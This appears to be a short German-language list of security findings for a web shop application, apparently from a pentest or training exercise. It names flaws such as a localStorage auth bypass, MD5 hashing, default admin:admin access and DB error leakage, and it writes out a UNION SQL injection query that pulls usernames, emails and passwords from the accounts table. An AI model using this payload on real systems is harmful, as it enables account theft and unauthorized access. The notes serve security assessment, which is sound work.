Fehler:
- Auth ByPass mit Localstorage Item
- APIs generell unprotected
- Url manipulation Orders
Fehler:
- MD5 Hashing
Detail View Parameter ist angreifbar mit Sql Injection
Normale Query:
SELECT * FROM orders JOIN accounts on orders.userid = accounts.did where orders.did = 1
Union Injection:
SELECT * FROM orders JOIN accounts on orders.userid = accounts.did where orders.did = 1
UNION
SELECT 999, 999, '999' const, 999, did, username,email, password FROM accounts where did = 1;
Example (URI encoded):
Fehler:
- Identification mit session Id (kann geändert werden im Localstorage)
- admin:admin zugang
- Cred Stuffing
Fehler:
- Logging von DB Fehlern direkt an die User
- kein Logging von Zugriffen